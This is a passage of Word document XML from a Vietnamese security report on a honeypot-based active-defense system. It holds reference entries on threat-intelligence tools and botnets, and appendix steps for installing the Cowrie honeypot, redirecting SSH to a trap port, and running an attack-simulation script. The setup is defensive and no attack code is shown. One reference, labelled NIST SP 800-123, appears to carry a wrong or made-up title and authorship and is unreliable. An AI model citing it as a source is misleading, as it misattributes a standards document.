    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[11] AbuseIPDB Project, 'AbuseIPDB API v2 Documentation: Reporting and Checking Malicious IP Addresses', 2024. [Online]. Available: https://www.abuseipdb.com/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[12] J. Matherly, 'Complete Guide to Shodan: Collect More Data, Find More Devices, and More', Shodan LLC, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[13] VirusTotal, 'VirusTotal v3 REST API Reference for Threat Intelligence and Malware Analysis', Google Chronicle, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[14] Thinkst Canary, 'Canarytokens: Quick, Free, Painless Breadcrumbs to Detect Network Intruders', 2023. [Online]. Available: https://canarytokens.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[15] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas, 'DDoS in the IoT: Mirai and Other Botnets', IEEE Computer, vol. 50, no. 7, pp. 80-84, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[16] N. Provos and T. Holz, 'Virtual Honeypots: From Botnet Tracking to Intrusion Detection', Addison-Wesley Professional, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[17] G. F. Lyon, 'Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning', Insecure.Com LLC, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[18] K. Scarfone and P. Hoffman, 'Guidelines for Implementing the Advanced Encryption Standard (AES) and Secure Shell (SSH) in Enterprise Environments', NIST SP 800-123, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[19] Endlessh Project, 'Endlessh: An SSH Tarpit that slowly trickles an endless SSH banner', 2023. [Online]. Available: https://github.com/skeeto/endlessh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="400" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[20] Telegram FZ-LLC, 'Telegram Bot API Manual for Webhooks and Interactive Inline Keyboards', 2024. [Online]. Available: https://core.telegram.org/bots/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT VÀ VẬN HÀNH HỆ THỐNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Phụ lục A: Hướng dẫn Triển khai Từng bước trên Máy chủ Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 1: Cài đặt các gói phụ thuộc và Cowrie Honeypot trên máy chủ Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>sudo apt-get update &amp;&amp; sudo apt-get install -y git python3-pip python3-virtualenv iptables</w:t>
              <w:br/>
              <w:t>git clone https://github.com/cowrie/cowrie.git</w:t>
              <w:br/>
              <w:t>cd cowrie</w:t>
              <w:br/>
              <w:t>virtualenv --python=python3 cowrie-env</w:t>
              <w:br/>
              <w:t>source cowrie-env/bin/activate</w:t>
              <w:br/>
              <w:t>pip install --upgrade pip &amp;&amp; pip install -r requirements.txt</w:t>
              <w:br/>
              <w:t>bin/cowrie start</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lệnh cài đặt và khởi động Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 2: Chuyển hướng lưu lượng mạng SSH từ cổng 22 sang cổng bẫy 2222:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
              <w:br/>
              <w:t>sudo iptables-save &gt; /etc/iptables/rules.v4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cấu hình chuyển hướng cổng trên iptables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 3: Khởi động Hệ sinh thái Active Defense &amp; Telegram SOAR Orchestrator:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>cd /path/to/soc-honeynet-active-defense</w:t>
              <w:br/>
              <w:t>python3 -m pip install -r requirements.txt</w:t>
              <w:br/>
              <w:t>python3 main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Khởi chạy bộ điều phối trung tâm Mini-SOC Active Defense</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Phụ lục B: Kịch bản Kiểm thử Diễn tập Red Team Tự động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để thực hiện bài kiểm tra diễn tập tự động chứng minh với Hội đồng Đánh giá, chạy kịch bản mô phỏng tấn công từ điển và thả mã độc:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>python3 scripts/simulate_attack.py</w:t>
              <w:br/>
              <w:t>python3 scripts/test_pipeline.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lệnh thực thi diễn tập kiểm thử toàn diện các kịch bản</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:titlePg/>
      <w:docGrid w:linePitch="360"/>
      <w:pgBorders w:offsetFrom="page" w:display="firstPage">
        <w:top w:val="double" w:sz="18" w:space="24" w:color="003366"/>
        <w:left w:val="double" w:sz="18" w:space="24" w:color="003366"/>
        <w:bottom w:val="double" w:sz="18" w:space="24" w:color="003366"/>
        <w:right w:val="double" w:sz="18" w:space="24" w:color="003366"/>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